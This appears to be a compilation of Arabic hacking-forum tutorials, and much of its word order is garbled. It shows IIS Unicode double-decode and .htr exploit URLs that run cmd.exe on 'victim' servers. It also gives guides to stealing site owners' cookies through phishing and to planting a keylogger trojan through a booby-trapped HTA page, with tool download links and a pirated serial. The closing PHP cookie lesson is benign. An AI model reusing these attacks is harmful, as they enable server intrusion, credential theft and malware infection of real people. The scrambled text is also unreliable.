الملففي .. تحميل اعادة يجب لذا العمل قيد المذكور الملفالنظام .. مدير يقوم ان يجب اخر بمعنى اي اخرى مره الذاكرة

تشغيل اعادة بعمل  . Logout & Login او Rebot الهدف

---------- +.htr :- --------- 

بملفات الخاص السورس بعرض تقوم ايضا الثغرة  . ASP هذهالشكل بهذا استخدامها  : يمكن

http://www.victim.com/global.asa+.htr 

------------- site.csc : - ------------ 

الـ عن مهمة معلومات معرفة من الثغرة هذه الخاص DNS تمكنكذلك في بما  .. DSN, UID and PASS Database بالموقع

 http://www.victim.com/adsamples/config/site.csc : الثغرةمعلومات .. على وسيحصل المذكور الملف بانزال المهاجم سيقوم

أيضا هامة و . قيمة19." الـ في وبعمق مفصلة "UniCodeدراسة

> إعصار منتدى من >منقول>Dark Devil :الكاتب<

بركاته و الله ورحمه عليكم :: السالمبخيرو تكونوا اتمنى ؟ كلكم اخباركم ايه شباب .ازيكم

رهيبه ظروف الله و لكن و عنكم انقطاعى و غيبتى على  اعذرونىبروكن رأى على فاضى كالم شويه فى نرغى خلونا االن  و

بعضمن جمعت بعدين و ادعبثشوى و االنترنت اتصفح كنتطبعا ) كود اليونى عن تتحدث هى و مختلفه ملفات من المعلومات

كود يونى ه ه ه ه ياه يقول و سيستعجل معظمكم االنفى .... ( كود اليونى ذكرت لقد اصبر اقوله انا لكن و الخ قديمهاالخ من مره و هنتر بالك الصديق عن مره مرات ثالث المنتديات

المره هذه لكن خلود ابو او ديمون الصديق عن مره هكسوالسابقه المرات االختالفعن تمام مختلفه ستكون Trust( صدقونى

Me (يعجبكم الدرسيمكن نقول خلونا و الخرابيط ها من دعونا االن ::و

:اوال====

كود؟ اليونى وجدت متىFound On 15 May 2001 BY NSFOCUS

هى بالثغره تتأثر التى :: السيستيمزAll running IIS 4 / IIS 5 web server

Windows 2kWindows 2k SP1 + SP2

يشغل :: بأن للهاكر تسمح ثغره عن عباره هى كود اليونى ثغرهبها مسموح بصالحيه بالقوه ( اوامر امتياز له يكون اى

IUSR_machinename account (

ال روتين ان نتيجه اصال الثغره هذه تحدث الويب cgi و على الموجودبال نسميه ما هذا و مرتين الموقع عنوان شفره يفك نفسه سرفر

DeCode ) ذلك بعد ستفهم تقلق ) ال

دى فوق كاتبها انا الى الخرابيط ايه اوضحلك خلينى معى  تعالى

مثال ليكن :: وhttp://iisserver/scripts/..%5c..%...md.exe?/c+dir+c ===< يونى ثغره

كود

http://iisserver/ ====< المصاب الموقع اى هدفنا هو هذا سيكونالمذكروه بالثغره

* /scripts/ - ( اى السرفر على تنفيذيه امتيازات لديه الفولدر هذا و

وهذا ( خالله من الوبسرفر على امر اى تنفيذ لليوزر يمكنسكربتسال تنفيذ فى المستخدم هو ايضا الموجوده cgi الفولدر

التنفيذى الفولدر يسمى الفولدر هذا بالتحديد و سرفر الوب على) executable directory اى

يمكن لكن و مثال فقط هذا ثابت اسم ليسله الفولدر هذا طبعا والملقم على كثيره اسماء له يكون :: iis ان يوجد ال هامه ملحوظه و

ملقم كل اى iis على الفولدرالتنفيذى  executable directory هذا

اسامى معظم ذكرو هكسقد االخ و هنتر بالك الصديق ان اعتقد وبعض ) الدروسمع اربط ان اريد فأنا شرحهم فى الديريكتورز هذه

متكامله ( سلسله تكون  حتى

* winnt/system32/cmd.exe ===< ال هو هذا طبعا يسمح cmd و الذىتنفيذها نريد التى االوامر سطور بأدراج ( لنا ممكن فكره على و

ال هذا مثل cmd تستعمل اوامر استخدام و netstat و ping فىtraceroute .... بعضنا يالحظها لم فكره انها اعتقد ) الخ

الثغره- * هذه فى االستفهام عالمه حتى تخيلو االستفهام عالمه ؟مش ) طبعا االمر بها ينفذ التى الحاله تعنى العالمه فهذه دور لها

عالمه ( ايه يعنى افهمك معى تعالى يهمك ال و ايه يعنى فاهمكلمه تعنى الحاله argument االستفهام تعنى التى هى الكلمه هذه ومثل ينتهى ثم لحظه فى ينفذ مثال امر انه اى االمر بها سينفذ التى

copy ان حقيقه و مفعوله يستمر لكن و ينفذ مثال امر انه ام مثالمن هى و العاديه االوامر هى نستخدمها التى االوامر معظم طبعاال argument /c نوع هذا ثم c/ و لحظه فى ينفذ االمر ان يعنى

 ينتهىويندوز :: عندك لو اكثر افهمك ال 2000تعالى افتح cmd و بتاعك

هذا لكنى , )?/ cmd( اكتب و جداا كثير كالم لك سيظهر انتر اضغط والباقى عليك انت و للتوضيح فقط بسيط جزء منه  اخترت

لك يظهر راح الى ايه :: شوفStarts a new instance of the Windows 2000 command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]

[[/S] [/C | /K] string]/C Carries out the command specified by string and then

terminates/K Carries out the command specified by string but remains/S Modifies the treatment of string after /C or /K )see below(

/Q Turns echo off/D Disable execution of AutoRun commands from registry )see

below(

هذا نشوف تعالى لكن و لك يظهر راح مما جداا بسيط جزء هذايقولك اوال معناه ايه :: الجزء

Starts a new instance of the Windows 2000 command interpreter و ويندوز ال مترجم من جديده حاله بدايه بالعربيه تعنى الجمله هذه

كل 2000 ان لنا وضح طبعا هذا و cmd فى صاحبه يتخكم ان يمكنال يغلق او يفتح ما حسب لنا . argumentsحالته يظهر بعدها و

arguments هو و الثغره فى دائما نستعمله الذى منها و c/ كثيرهامامه المكتوب ما كده :: شوفو

Carries out the command specified by string and then terminates ثم االوامر سطر فى الموجود االمر ينفذ انه معناه الكالم هذا و

نعرفها التى العاديه لالوامر هذا طبعا و  ينتهىعن :: يتكلم انه نجد سوف تحتيه الى السطر نشوف argument تعالوال هو و كود اليونى ثغره فى نراه امامه k/ ال مكتوب ايه ::شوفو

Carries out the command specified by string but remains طبعا ومفعولها يستمر لكن و السطر فى الموجوده االوامر ينفذ انه معناه

) و امامى مكتوب هو ما هذا لكن و هذه مثل اوامر عن ابحث زلت مامثل حبتين طويله فتره تأخذ التى االوامر انها تقول تقدر ping لكن

) مثالهناك مثال مثل argument و تفعيل Q/ أخر اغالق فى نستخدمه هذا و

فوق echo امر المثال فى واضح هو  كماال هذه من الكثير هناك ال arguments و اساسى هو ما منها طبعا و

فيه التحكم ( يمكنك ال مثل غلقه او فتحه ال c/ يعنى هناك ) k/ و وتجعلهم ان يمكنك ال off او on اخرين بحاله تتحكم انت تكون بهذا و

cmd ( تالقى راح النك المكتوب تقرأ و االمر تنفذ ياريت خاصتكانتهى ( حتى قليال على اصبروا و بالتفصيل الغلق و الفتح تفاصيلفى االول االمتحان الله MCSE من شاء ان اسبوعين خالل فى

بالتفصيل النقطه هذه لكم نشرح و قوه اكثر نعود ذلك بعد و تعالىشوى بساصبرو الله شاء  ان

ال هى ما فهمت االن انك فائده arguments اعتقد ما التى c/ ومعناها تعرف ال انك متأكد انا و الثغره فى . تكتبها

ال , تشغل انت الثغره فى جدااا بسيطه و سهله لنقطه نروح تعالوcmd.exe لكن و و الخ االندكسو تغير و بالموقع تتحكم ان تريد النك

؟ نشغله كيف ياترى تانى ملف اى نشغل مثال تعالىالفايل :: اسم بوضع تقوم ان هو فعله عليك ما كل كيف اقلك راح اناالشكل بهذا تشغيله تريد من Ping.exe+PRINT الذى cmd.exe?/c بال

تريده الذى الفايل شغلت قد تكون بهذا  و)enjoy this ( . الشكل بهذا الثغره تصبح :: حيث

http://issserver/scripts/..%5c..%.../ping.exe+PRINT

* /c+ - انا فوق عرفنا كما بالتالى ال c/ و cmd.exeلل argument هىال عليها سينفذ التى الحاله بجانب + cmd او التى ال عالمه اما االمر

يمكننا c/ ال ال لكن و الثغره فى الكلمتين بين المسافه بمقام فهىسطر يحمله الذى االمر يكون بعدها و عاديه بمسافه اسبدالها

تعرض + الذى الدرايف اسم بعدها و ثانيه عالمه ثم لينفده االوامرحاليا الشاشه على . محتوياته

** كما الثغره سبب اساسا هى و الثغره فى نقطه الهم االن نأتى والعنوان ) شفره حل يكون الثغره سبب ان هو الكالم اول فى ذكرنا

ال ( عليه نطلق ما هذا و مره من افصل decodeاكثر شخصيا انا والرياضيات فى كما الحل البسط نصل حتى تحليل انه على الديكودز

هذا simplyfiey يعنى نفهمكم خلينا تعالو المعادله فك و تبسيط اىنفسها الثغره :: على

/..%255c..%255c لالصل التحليل اى الديكود هو ..../ هذا؟ الغريبه التحليالت بهذه نفعله ان نحاول الذى ما ولكن

و الديريكتورز مسارات فى نلعب و نحسن ان نحاول بذلك فنحن

ال الن الديريكتورز فى اللعب او تغيير يمكنك ال لالسف iis لكنعمل بخاصيه من check مزود منعها و الديكودز هذه مثل على

او لمرتين التحليل هو و كود اليونى ثغره اصل يقع هنا و التنفيذال ان اى االن قصدى فهمتم مره من ال iisالكثر بخاصيه فعال مزودcheck من اكثر بها و الثغره تضع انت لكن و الديكودز هذه على

ال يقوم لذلك و الموقع لنفساسم واحد بوظيفته iis تحليلال هى و ان check المعتاده له يظهر و االول الديكود على المنع و

لكن و الموقفخخخخخخخخ على يسيطر انه و بخير شئ كلال يعمل انه الديكود checkالحقسقه ان النتيجه فتكون واحده مره

يكون بالتالى و الديريكتورز فى اللعب محاوله فى تماما ينجح الثانىاى اصله الى يرجع ان هو الثانى الديكود ) slash( / نتيجه

عرفنا ان بعد للثغره الديكود تفاصيل فى اكثر نتعمق و ندخل تعالو و:: فكرتها

اسمها ماده فيه درسفيها computer logic شوفو راح دى الماده ويسمى ال HexaDecimal Values شئ هذه اساس values و هى

مثل / حركه او حرفصحيح كل ان اى الثغره فى نفعله الذى الديكودبال يسمى ما لها الكمبيوتر اكثر hex value فى اوضحلك :: تعالى

مسافه 20مثال: % تعنى )space(جدول يوجد طبعا و كالمى االن فهمت انك اعتقد و بسيط مثال هذا

ال فى hex values لهذه العاديه الحركات و للحروف المساويهترسل , انك االن تماما ادركت انك اعتقد اذن hex values الكمبيوتر

ما بالضبط هذا و السرفر الى العاديه الحركات و الحروف عن عوضاال او الشفره فك او التحليل  decodeنسميه

نشرح التى الحركه سنأخذ و اكثر الثغره تفاصيل نخشفى تعالىال هى هذه ) slash( / عليها فى الديكود اساسيات من انها حيث

:: الثغرهال جدول فى ال / = % hex value شوف ان نجد 5راح c , هو هذا طبعا

منها / بدال تضع و ال تحذف انك فى االن ستفكر الذى االول الديكودال هو valueهذا هذا الن خطأ هذا لك اقول انا لكن و الثغره فتنجح

اكثر ممكن او مرتين يحدث الديكود ان ذكرت انا و االول الديقودال ان فستجد االول الديكود هذا وضعت لو القدره iis يعنى لديهان علينا لذلك و التنفيذ من يمكنعه و الديكود هذا يمسك ان على

ال هذا الثغره value نحلل فتنجح التانى الديكود يتم  حتى

ال جدول الى بالنظر هذا hexadecimal values و نجد :: شوف% = %255 = %35c = %63

ال خدعنا قد انفسنا نجد بالتالى شفره iis checker و ال حللنا بأننابالتالى / و هو و االصل على المقابل فى فسنحصل بالتالى و مرتين

الثغره نجحت قد . تكون

اساس فهمتم و مرتين العنوان ديكود معنى شباب االن فهمتمو مرتين االول التحليل تكرار ليسمعناه مرتين الديكود و الثغره

اى االول التحليل فك و تحليل معناه و simplify لكن ابسط الىنفسالوقت فى ممكنه صوره  اطول

للتحليل الصح التركيبه كيف احطلك راح معك اكثر توضح عشان :: و%255c %25 = % 5 = 5 c = c = %5c

%%35c % = % %35 = 5 c = c = %5c%%35%63 % = % %35 = 5 %63 = c = %5c

%25%35%63 %25 = % %35 = 5 %63 = c = %5c 

5ثم : % c =/

هو و االصل الديكود يساوى ان يجب االخر فى طبعا التحليل ارائيتمتساوى % التحليالت كل مثالنا فى واضح 5كما c % ذكرنا كما 5و c = /

ال نخدع حتى تحليل ابسط و اطول الى الرمز هذا حللنا لكننا iis وchecker .

بعض مع نطبقها تعالو هيا اساسها و للثغره فهمنا بعد النهايه فى  والشكل هذا فى الثغره نضع :: سوف

http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s

قد جديد شئ تالحظون اكيد لكن و بنجاح الموقع على ستدخلون وهو الشى هذا و الثغره على s/+ زاد

الرمز  هذاالسابقسوف المثال فى كما الثغره مع الرمز هذا تدمج عندما و

الويبسرفر كمبيوتر فى صغير و كبير فايل بكل لسته  تأتيك

تجميعها و المعلومات قرائه فى تعبت الدرسو هذا فى تعبت الله وانتظرو الله شاء ان و االخوه الشكل لهذا اصل حتى كود اليونى عن

فى االول امتحانى انهيت اكون بعدما القادم ( MCSE موضوعىبالنجاح شبكات ) ادعولى مع للتعامل تلخيص عن عباره سيكون و

ال 2000ويندوز فائده و اختراقها كيفيه و WIN2000 RESOURCE KIT.

،،،انتهى

اليونيكود " بواسطة اإلختراق عملية على " تدريب> ماكسهاك: > الكاتب

الرحيم الرحمن الله ..بسمعن شرح عندي واليوم بأنواعه المواقع إختراق عن الكالم كثركيفية على عملي تطبيق باألصح أو اليونيكود طريق عن اإلختراق

الذي وهو للمبتدئين يعتبر النوع وهذا اليونيكود طريق عن اإلختراقاإلحتراف طريق إلى سيوصلهم الله ..... بإذن

******************نبدأ الله ...بسم

وتقوم السيرفر أو الموقع مثل وهو جهازك على التطبيق سيكونمصاب موقع على وأنك الدرسكما .....بتطبيق

ويندوز نظام بتركيب قم المواقع إختراق على تتدرب على 2000لكي سيرفر . بإضافة تقوم النظام تبع نفسالسيدي وفي IIS جهازك

طريق عن : وذلكالتحكم *1 لوحة إلى بالذهاب .قم

برامج *2 إزالة إضافة على بالنقر .قمويندوز " *3 مكونات إزالة إضافة زر على بالنقر ." قم

األول *4 الخيار على صح عالمة بوضع .”IIS“ قمالسيرفر تنزيل لكيفية بالنسبة ..هذا

: ـ بالتالي فقم اختراقه أي الجهاز على التدرب كيفية عن امامجلد في الموقع بوضع wwwroot قم مجلد داخل Inetpub الموجود

السيرفر تشغل ما بعد عليه هتدخل طريق IIS طبعا عنhttp://127.0.01/

عمران برنامج بتشغيل قم عليها والتدرب الجهاز في الثغرة وإليجادوقم اليونيكود تبع الثغرات للفحصعن اخر برنامج أي أو سكان

هو الي تبعك العنوان /http://127.0.0.1 بوضعالمصابة المواقع اختراق في تعلمتها التي المهارات بتطبيق وقم

.باليونيكود،،،انتهى

المجانية " المواقع اختراق لكيفية مفصل " شرح> إعصار منتدى من >منقول

>De\/iL Ni9hT :الكاتب<-= المجانيه المواقع اختراق  -=سهوله

مماتتصور,,, اسهل اختراقها ان  نعم

جميع على يحتوي النه الكوكيز هو شي كل الختراق االساسيات)) ,, ,, الخ)) ايميل الموقع  المعلومات

مجاني موقع اي الختراق مهمه نقاط عده تعرف ان يجب  ولكن

 -=اوال

المتصفح اصدار نوعيه معرفه عليك  يجب

 -=ثانيا

.. وتستطيع الخ االيميل مثل الموقع صاحب بيانات بعض معرفه عليكببعضالطرق له  -=التوصل

 -=ثالثا

المتصفح من الكوكيز لسرقه االزمه االكواد ايجاد اوال  -=عليك

الشرح  لنــبدأ

سهله الموقع لصاحب المتصفح اصدار نوعيه لمعرفه االولى النقطهالخاصبصاحبه المتصفح نوعيه علىحسب يصمم موقع فكل جدا

ويعطيك معينه بدقه تصفحه يفضل الموقع نهايه في لنا ويكت

= المناسب الموقع لتصفح المناسب االكسبلور اصدارشئ= واهم نقطه اسهل بهوهذه الخاص نفساالصدار لتصميمه

المجانيه المواقع الختراق  فيها

يكون ان ويجب طرق عده فهناك الضحيه الى للوصول بالنسبه واما (( هنا ساضعها الكوكيز بسرقه الخاصه الهتمل اكواد معاكصفحه(( في تضعها االكواد هذه على حصلت بعدما واالن الحقا

طرق عده وهناك لها للتوجه الضحيه جذب  وتحاول

1- وضعه اذا الموقع في مكان اي من ايميله او ماسنجر عنوان تاخذ)) (( وتعطيه مصلحه حب هههههههه عنده موثوق وتصير وتحبهملفسارق له ترسل او الكوكيز فيها حطيت الى صفحتك

 الباسوورد

2- للموقع المجانيه االستضافه مقدمه الى الشركه نوعيه تحدد مثالالموقع عنوان كان اذا  /http://www.name.8m.com فمثال

سيرفر فري شركه من مقدم الموقع ان معناه FreeServerS فهذاالمجانيه المواقع الى بالدخول المحدده النطاق معرفه وتستطيع

(( المتاحه الدوامين انواع لك وستظهر تسجيل 8وعمل m.s5....الخ 

خاص تصميم لهم ويكون البيانات لك وسيرسلون عندهم وتسجل(( طبعا الرساله محتوى وتغيير نفسالتصميم بسرقه عليك وانت جدا

(( الى(( موقعك موقع فتح منه تتطلب منه رساله وارسال بالعنقليزي )) رأى اذا يشك لن اخروهو شئ اواي التحديثات لعمل مثال الكود فيه

وسيفتح الشركه موقع نفسطريقه وطريقتك رسالتك تصميمحاال  الموقع

الزوار سجل تدخل مثال انك وهى طريقه فهناك ايميله يضع لم واذاتصميم له تقول مثال يعني بقوه يجذبه و يقهره عندهوتكتبشي

(( للمره وهو اللنك وتعطيه الموقع هذا من حرفيا مسروق موقعك )) من اخرى طريقه اي او الكود فيه الى الموقع اقلكم المليون

الموقع اختراق عليك فهناك زوار سجل او ايميله تجد لم ذكائكواذاجدا جدا صعب وهو  بالثغرات

الكوكيز وهي الثالثه  -=النقطه

معاه مرفق تاني موضوع في بحطشرحه كدا عشان شرحها يطولكوكيز لسرقه معها التعامل طريقه مع بالمتصفحات الخاصه االكواد

جهازك الى وتوصيله  الضحيه

متصفح لديهم اصحابها التى المجانيه المواقع اختراق IE 5 IEطريقه5.5 

صاحب الى الوصول استطعت اذا تستعملها التى الطريقه هي هذه))" المجانيه )) " المواقع اختراق سهوله درس راجع  الموقع

على وسنعتمد الباسوورد سرقه في الكوكيز على نعتمد لن اوالالكيبوردواليكشفه في شي كل يسجل وخطير قوي تروجان

اول ملغومه صفحه في سنضعه الذي فايروسوهو انتي النورتونجهازه الى ينزل الضحيه  ,,,,مايفتحها

برنامج بتحميل قم keykey2000 اوال كلشي يسجل البرنامج وهذاوانا االيميل على ويرسلها بها تعمل كنت الى واالشياء بالكيبورد

العمليات اللغاء الثالثه واالزرار الجديد النورتون واليستطيع مجربهووصلته ايقافه النظام في  النشطه

http://www.mikkotech.com/kk2000pro.exe 

نمبر والسيريال

SN: K100-43-109-0-793218E876A4C9-29

كلمونيواالن شرحه اردتم واذا لشرح يحتاج وال جدا سهل والبرنامجبرنامج بتحميل قم البرنامج الباتشبهذا ملف جهزت godwillبعدما

اكسبلور انترنت على الموقع الخاصاللغام البرنامج و 5وهو 5.5)) ووصلته)) المهنه سر هي هذه  

http://www.thecorpz.org/activex/gwpackage.zip 

=====================الشــــرح====================

سهل النه للبرنامج بسيط شرح وهذا بالصور شرح بعمل اقوم لن انا جدا

منها اختار لوحه لك ستظهر البرنامج تفتح  عندما

enter منها يهمنا والذى القائمه لك وستظهر االسفل  في

Upx)) (( موضوعنا عن خرجنا اظننا الباتش لتشفير  وهذا

Html نضغط وعندما ملغومه صفحه بعمل نقوم لكي هنا شغلنا وكلمنها اختار وانت اختيارات عده تجي  عليه

General options وهذا الملغومه الصفحات عرض مربع لك وستظهرلها سريع  شرح

enter exe file حجمه يكون اال بشرط سويته الباتشالى تضع هنا ومن)) (( فيشئ المعلومه هذه تفيدنا هل جدا  كبير

enter html صح عالمه وحط الغامها ثم جهازك من الستعراضصفحه

use default page جانب جديده صفحه بعمل البرنامج  ليقوم

االسفل HTA File Nameوفي االنتهاء وبعد الصفحه اسم تضع وهناكلمه نختار ذلك Done من (( وسيكون الصفحه بعمل البرنامج ليقوم

)) البرنامج نفسمجلد في  مكانها

واضحا الشرح يكون ان  وارجو

الموقع هذا الى توجه البرنامج مع مشكله واجهت  واذا

http://www.thecorpz.org/html/activesploits.html 

=================== الشـــرح  ====================نهايه

للضحيه واعطائها النت في الملغومه الصفحه بوضع تقوم وبعدماجهازهعندما على التروجان سينزل سابقا شرحتها التى بالطرق

بريدك في تنتظر انت االن لك يبقى ولم الملغوم موقعك بفتح يقوم(( الموقع مثل الضحيه عن المعلومات التروجان في حطيته الى

)) االشتراكات,, لسرقه ايضا تنفع الطريقه وهذه الخ وااليميلوايميله المنتديات في .واساميه

،،،انتهى

الكوكيز " عن " درسمفصل> فلسطين هاكرز منتديات من >منقول

>Linux Girl :الكاتب<مقدمة

الكعكات مواقع ) s****** الـ ( تعد انشاء في المفيدة الوسائل منالمتصفح قام هل معرفة من ستتمكن فبواسطتها ، تفاعلية اكثر

ال ام قبل من موقعك .. بزيارة

استخدامها يمكننا كيف و الكعكات على الدرسسنتعرف هذا ... في

الدرس : اقسامعامة -1 . معلومات

العميل -2 جهاز على الكعكات . زراعةالعميل -3 جهاز من الكعكات . قراءةالخلفية : -4 لون تخصيص . تطبيق

عامة معلومات

؟ - الكوكيز ملفات هي ماتزورها التي المواقع تقوم ، نصية ملفات عن عبارة الكوكيز ملفات

الملفات هذه وتحتوي ، جهازك في الصلب القرص على بإيداعهاعند يسترجعها أن أودعها الذي للموقع تتيح معلومات على النصية

للموقع المقبلة زيارتك عند أي ، . الحاجة

موقع من الكوكيز ملفات ضمن تخزن التي المعلومات وتختلفمعلومات أي استرجاع المواقع هذه ليسبإمكان ولكن ، آلخر

في المخزنة المعلومات تلك باستثناء ، جهازك عن أو عنك إضافية ، الموقع قبل من إرسالها تم والتي ، بها الخاص النصي الملف

الكوكيز ملفات مضمون على االطالع المواقع هذه تستطيع ال وبذلكجهازك على خاصة ملفات أي أو ، . األخرى

؟ - جهازك على الكوكيز ملفات إيداع يتم كيف ، العناوين شريط في موقع عنوان إدخالك عند ، المتصفح يرسل

عنوان متضمنا ، حددته الذي الموقع إلى ونوع IP طلبا ، به الخاصتخزن . جهازك يدير الذي التشغيل ونظام ، تستخدمه الذي المتصفح

بالمزود خاصة ملفات في المعلومات ، Log Files هذه عالقة واليبحث . ذاته الوقت وفي إرسالها يتم التي بالمعلومات للكوكيز

فإذا ، المطلوب الموقع تخص التي ، كوكيز ملفات عن المتصفحفإن ، توجد لم وإذا ، الموقع مشاهدة طلب مع إرسالها يتم وجدها

ملفات بإرسال فيقوم ، إليه األولى زيارتك هذه أن سيدرك الموقععليه لتخزن جهازك إلى  . الكوكيز

أو الكوكيز ملفات ضمن الموجودة المعلومات تغيير الموقع وبإمكانبعض . تخزين يتم الموقع بزيارة قمت كلما جديدة معلومات إضافة

عند مباشرة حذفها يجري بحيث ، فقط الذاكرة في الكوكيز ملفاتالكوكيز " ملفات وتسمى معظمها ولكن ، المتصفح إغالقك

لحين" الصلب القرص على محددة لفترة تخزينها يتم ، المثابرةأما . سنوات حتى أو أشهر مدة صالحيتها تدوم وقد صالحيتها انتهاء

فإنها ، سابق لتاريخ صالحية تاريخ تعرض التي الكوكيز بعضملفاتالمعلومات . وتعود الصلب قرصك على ن تخز وال مباشرة تحذف

فقط أصدرها الذي الموقع مزودات إلى الكوكيز ملفات في المخزنةتصدرها التي الكوكيز ملفات الكبرى بعضالشركات تعمم وقد ،

تصدر ال ولكي ، المتضمنة المعلومات لتنسيق ، مزوداتها جميع علىزيارته عند ، ذاته للمستخدم كوكيز ملفات مزوداتها من كل

الموقع في مختلفة . لصفحات

الكوكيز - ملف : مكوناتانتهاء تاريخ ، قيمته ، الملف اسم هي اجزاء عدة من عادة يتكون

له المالك الموقع ، ... مفعوله

العميل جهاز على الكعكات  زراعة

الكعكات : ملفات تزرع كيف : أوالالدالة باستخدام ذلك التالي ******set يتم بالشكل تعريفها : و

code:________________________________________

boolean set****** ) string name [, string value [, int expire 

[, string path [, string domain [, int secure]]]]](

________________________________________

هي و االولى الثالث المدخالت : تهمناname : ... الى كعكة من اكثر ارسال فبامكانك الكعكة اسم اي

للتمييز الوحيدة الطريقة هو االسم يصبح عندها و واحد . متصفح

value : ... ... كقيمة مصفوفة وضع يمكنك ال نصية قيم فقط القيمةبطريقة ... لكن مصفوفة وضع بامكانك انتبه لكن مهم أامر هذا و

الدالة ... : استخدم ؟ كيف ؟ بي serialize اخرى في متغير اي لتحويلاستخدم ثم من و نصي شكل الى الى unserialize اتشبي العادته

الطبيعي . الشكل

expire : ( اليونكس عصر بدية من الثواني عدد و ( 1970يناير 1اي الكعكة ... بحذف المستخدم جهاز على المتصفح سيقوم بعدها التي

حاالت ثالث هنا : والحالي : >-- الوقت من اكثر كمدخل المعطى الوقت يكون أن أوال

تحذف و العميل جهاز على الكعكة تخزن عندها و العميل جهاز علىالمدة انقضاء . عند

على : >-- الوقت من اقل كمدخل المعطى الوقت يكون أن ثانيابتخزينها العميل جهاز على المتصفح يقوم ال عندها و العميل جهاز

المدة تنتهي لم لو حتى يحذفها فانه بنفساالسم كعكة وجدت اذا و.

و : >-- المتصفح ذاكرة في تخزن الكعكة فان وقتا تحدد لم إذا ثالثاالموقع المستخدم يغلق حالما . تفقد

: مثالcode:

________________________________________>? 

set******)'site','http://www.palhackerz.com/',time)(+3600(; 

?< ________________________________________

دالة المفيدة الدوال شكل time من على الحالي الوقت ترجع التي واليونكس ) عصر بداية من الثواني (1970يناير 1عدد .

كعكة تعدل او تحذف كيف :ثانياالقيمة خالية و بنفساالسم كعكة ترسل أن عليك كعكة تحذف لكي

المستخدم جهاز على الوقت من اقل وقت ذات و

: مثالcode:

________________________________________>? 

set******)'site','',time)(-360000(; 

?< ________________________________________

 : مالحظاتفارق -1 تتفادى لكي كبيرة قيمة اجعله ماضيا زمنا تحدد عندما

العميل و الخادم بين . التوقيتجديد -2 من إرسالها و حذفها عليك كعكة أي تعدل . لكي

مهمة : مالحظةالدالة تستدعي ان الى ******set يجب شيء اي ترسل أن قبل

ينجح .. لن التالي الكود فمثال : المتصفحcode:

________________________________________>html< 

>body< 

>? 

set******)'site','palhackerz.com',time)(+20000(; 

echo " Alfjr.com : the best islamic forum"; 

?< 

>/body< 

>/html< 

________________________________________

تعمل ?< فلن البداية عالمة قبل فارغ سطر مجرد هنالك كان لو بل... ******set الدالة

يكون ان الممكن من كان السابق : المثالcode:

________________________________________>? set******)'site','palhackerz.com',time)(+20000(; 

?< 

>html< 

>body< 

>? echo " palhackerz.com : the best Hacking forum"; ?< 

>/body< 

>/html< 

________________________________________

العميل جهاز من الكعكات  قراءة

الكعكة - من المتغيرات تستقبل : كيفواحد متصفح الى كعكة من اكثر ارسال بامكانك بانه قلنا .. كمافان موقعك على صفحة متصفحه من المستخدم يطلب عندما

عند بزراعتها انت قمت التي الكعكات جميع بارسال يقوم المتصفحفي PHP ... المستخدم تخزنها و الكعكات هذه قراءة عليك تسهل

النوع ******_$ من مصفوفة هي و اسمها Associative مصفوفةArrays كما الكعكة قيمة القيمة و الكعكة اسم هو المفتاح ان بحيث

. ارسلتها

: مثالcode:

________________________________________>? 

echo $_******['site']; 

?< ________________________________________

تطبع هذه  : وcode:

________________________________________palhackerz.com

________________________________________الخلفية : لون تخصيص  تطبيق

الكعكات نستخدم و مبسط موقع بانشاء نقوم دعنا بسيط كمثالالشخص الى المحببة الخلفية لون نحفظ .. لكي

؟ - لدينا ماذابعمليتين : user.php الملف -1 الملف : يقومالزائر : >-- اختاره الذي اللون تحديد . االولى

المختار : >-- اللون حفظ و الللون اختيار نموذج عرض الثانية

من index.php الملف -2 تستفيد التي و الموقع صفحات إحدىالملف . user.php خدمات

ملف الخاصبكل الكود : وإليك: user.php الملف -1

code:________________________________________

>? 

/*----------------------- 

******s-Based Background Selector.. 

Created By : "Rasha">rasha@h4palestine.com< 

For : h4palestine.com 

-------------------------*/ 

function display_form)({ 

?< 

>html< 

>body< 

>!-- Color setting Form --< 

>form name=color_select method="GET"< 

>INPUT type="hidden" name="do" value="set_color"< 

>INPUT name="color" type="text" value=" 

>? echo get_color)(; ?<"< 

>INPUT type="submit" value=" اللون  >"احفظ

>/FORM< 

>!-- Color Clearing Form --< 

>form name=color_clear method="GET"< 

>INPUT type="hidden" name="do" value="clear_color"< 

>INPUT type="submit" value=" المفضل لوني تتذكر  >"ال

>/FORM< 

>? 

} 

function set_color)({ 

global $_GET; 

set******)'color',$_GET['color'],time)(+36000(; 

header)'Location:index.php'(; 

} 

function get_color)({ 

global $_******; 

if)isset)$_******['color'](({ 

return $_******['color']; 

}else{ 

return "#FFFFFF"; 

} 

} 

function clear_color)({ 

set******)'color',$_GET['color'],time)(-36000(; 

header)'Location:index.php'(; 

} 

// selection 

if )$do=='display_form'({ 

display_form)(; 

}elseif )$do=="set_color"({ 

set_color)(; 

}elseif )$do=="clear_color"({ 

clear_color)(; 

} 

?<________________________________________

االولى - اللون display_form الدالة اختيار نموذج بعرض فقط . تقومالثانية - و set_color الدالة كعكة في المختار اللون بحفظ تقوم

الرئيسية الصفحة الى المستخدم . ترجعالثالثة - يكن get_color الدالة لم اذا و الكعكة من اللون قيمة ترجع

االبيض وهو افتراضي لون ترجع فانها قيمة . هنالكالرابعة - التي clear_color الدالة بالطريقة الكعكة بمسح تقوم

الدرس في . ذكرناها

الـ -2  : index.php ملفالدالة يطلب انه اال جدا عادي ملف get_color ملف كما user.php من

: يليcode:

________________________________________>html< 

>BODY bgcolor=">? include)'user.php'(; 

echo get_color)( ?<"< 

>h1< بك  >h1/<..... مرحبا

>br< 

هنا من الخلفية تخصيصلون  يمكنك

>br< 

>a href="user.php?do=display_form"< اللون تخصيص  >a/<صفحة

>/body< 

>/html< 

________________________________________بيج ".20 الفرونت تدعم التي المواقع عن مهمة " معلومات

>منقول<>. ) T.O.L. ) DeXXa :الكاتب<

الدرس هذا قراءة قبل تعرفه أن يجب الذي  : ما

باالنجليزية *  . االلمامالـ * عن المزيد ليسكيفية FrontPage Server Extensions قراءة و

 . اختراقهبرنامج * مع التعامل  . Microsoft Office FrontPage كيفية

الـ * مع التعامل  . CHMOD كيفيةالـ * مع التعامل  . Telnet كيفية

بروتوكول * مع التعامل  . HTTP كيفيةالعالئقية * البيانات قواعد مع التعامل  . SQL كيفية

الخادم * بناحية تعمل التي و الويب لغات أحد مع التعامل كيفيةServer Side Scripting Language . 

